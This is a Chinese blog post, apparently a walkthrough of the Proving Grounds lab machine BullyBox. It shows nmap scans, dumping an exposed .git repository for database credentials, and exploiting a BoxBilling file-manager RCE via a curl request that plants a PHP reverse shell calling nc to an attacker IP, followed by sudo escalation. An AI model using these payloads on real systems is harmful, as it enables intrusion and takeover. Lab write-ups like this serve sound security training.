当前位置: 首页 > article >正文

OSCP - Proving Grounds - BullyBox

article 2025/1/21 12:29:09

主要知识点

  • 如果发现有域名,则可以加入/etc/hosts后重新执行nmap,nikto等扫描
  • dirsearch的时候可以使用完整一些的字典文件,避免漏掉信息
  • .git dump

具体步骤

执行nmap 扫描,发现 80和22端口开放,访问后发现被重定向到 bullybox.local

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 12:20 UTC
Nmap scan report for 192.168.59.27
Host is up (0.00072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.52 (Ubuntu)

尝试修改/etc/hosts,将ip与bullybox.local绑定,之后重新执行nmap扫描,得到了更多的信息,比如.git路径,以及robots.txt中的entries

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 17:50 EDT
Nmap scan report for bullybox.local (192.168.174.27)
Host is up (0.44s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
| http-robots.txt: 8 disallowed entries 
| /boxbilling/bb-data/ /bb-data/ /bb-library/ 
|_/bb-locale/ /bb-modules/ /bb-uploads/ /bb-vendor/ /install/
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Client Area 
| http-git: 
|   192.168.174.27:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Ready For launch 
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

访问robots.txt中的路径,得到疑似admin用户名

利用搜索引擎寻找 可以dump .git的应用,得到GitHub - arthaud/git-dumper: A tool to dump a git repository from a website,尝试运行后,成功dump git代码库,如果配置了代理,记得调用unset http_proxy,否则会报502错误

C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
/home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://bullybox.local/.git/HEAD [502]
[-] http://bullybox.local//.git/HEAD responded with status code 502
                                                                                                                                                                                                                                            
C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> unset http_proxy                                                                                           
                                                                                                                                                                                                                                            
C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
/home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://bullybox.local/.git/HEAD [200]
[-] Testing http://bullybox.local/.git/ [403]
[-] Fetching common files
[-] Fetching http://bullybox.local/.git/hooks/post-update.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-commit.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/post-commit.sample [404]
[-] http://bullybox.local/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://bullybox.local/.git/description [200]
[-] Fetching http://bullybox.local/.gitignore [404]
[-] http://bullybox.local/.gitignore responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/post-receive.sample [404]
[-] http://bullybox.local/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://bullybox.local/.git/COMMIT_EDITMSG [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/commit-msg.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-push.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://bullybox.local/.git/index [200]
[-] Fetching http://bullybox.local/.git/objects/info/packs [404]
[-] http://bullybox.local/.git/objects/info/packs responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/pre-receive.sample [200]

执行cat /bb-config.php,发现疑似密码,结合已经发现的用户名admin@bullybox.local,登录成功

 array (
    'type' => 'mysql',
    'host' => 'localhost',
    'name' => 'boxbilling',
    'user' => 'admin',
    'password' => 'Playing-Unstylish7-Provided',
  ),

发现版本为4.22.1.5,搜索一下发现有文件上传漏洞BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) - PHP webapps Exploit,尝试利用一下

先利用firefox得到Cookie中保存的phpsessionid,并在本地启用nc -nlvp之后调用如下命令,我是用Postman调用的,会生成下面的curl命令

curl --location 'http://bullybox.local/index.php?_url=%2Fapi%2Fadmin%2FFilemanager%2Fsave_file' \
--header 'Cookie: PHPSESSID=tjlfj0mpf85cjgh8g0rjtc0jnn \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'order_id=1' \
--data-urlencode 'path=reverse.php' \
--data-urlencode 'data=<?php shell_exec('\''rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.209 80>/tmp/f'\''); ?>'

得到反弹shell,并且具备SUDO权限,可以直接拿到flag

C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox> nc -nlvp 80  
listening on [any] 80 ...
connect to [192.168.45.209] from (UNKNOWN) [192.168.226.27] 57090
bash: cannot set terminal process group (1311): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

yuki@bullybox:/var/www/bullybox$ id
id
uid=1001(yuki) gid=1001(yuki) groups=1001(yuki),27(sudo)
yuki@bullybox:/var/www/bullybox$ sudo -l
sudo -l
Matching Defaults entries for yuki on bullybox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User yuki may run the following commands on bullybox:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
yuki@bullybox:/var/www/bullybox$ sudo cat /root/proof.txt
sudo cat /root/proof.txt
2cf1d3dd8eab874dd006dad9912c1388
yuki@bullybox:/var/www/bullybox$


http://www.kler.cn/a/512073.html

相关文章:

  • 【银河麒麟高级服务器操作系统】业务访问慢网卡丢包现象分析及处理过程
  • springboot项目属性配置方式
  • 要获取本地的公网 IP 地址(curl ifconfig.me)
  • Linux自动挂载磁盘的方法
  • Kinova仿生机械臂Gen3搭载BOTA 力矩传感器SeneOne:彰显机器人触觉 AI 与六维力传感的融合力量
  • Rust 数据类型详解
  • 基于SpringBoot的个人博客系统的设计与实现(源码+SQL脚本+LW+部署讲解等)
  • 单行文本框控件
  • (4)Vue 3 + Vite + Axios + Pinia + Tailwind CSS搭建一个基础框架
  • STL—stack与queue
  • 区块链 智能合约安全 | 回滚攻击
  • 【QT】 控件 -- 按钮类(Button)
  • 图解Git——分布式Git《Pro Git》
  • Java虚拟机相关八股一>jvm分区,类加载(双亲委派模型),GC
  • 2025.1.16——四、get_post 传参方式
  • VIVADO ILA IP进阶使用之任意设置ILA的采样频率
  • 人形机器人将制造iPhone!
  • 在Spring Boot中使用SeeEmitter类实现EventStream流式编程将实时事件推送至客户端
  • 后端架构学习笔记
  • Go语言的正则表达式
  • leetcode 221. 最大正方形
  • 提升大语言模型的三大策略
  • NLP 单双向RNN+LSTM+池化
  • 苍穹外卖 项目记录 day07 商品缓存-购物车模块开发
  • [实战]Ubuntu使用工具和命令无法ssh,但使用另一台Ubuntu机器可以用命令ssh,非root用户。
  • 『 实战项目 』Cloud Backup System - 云备份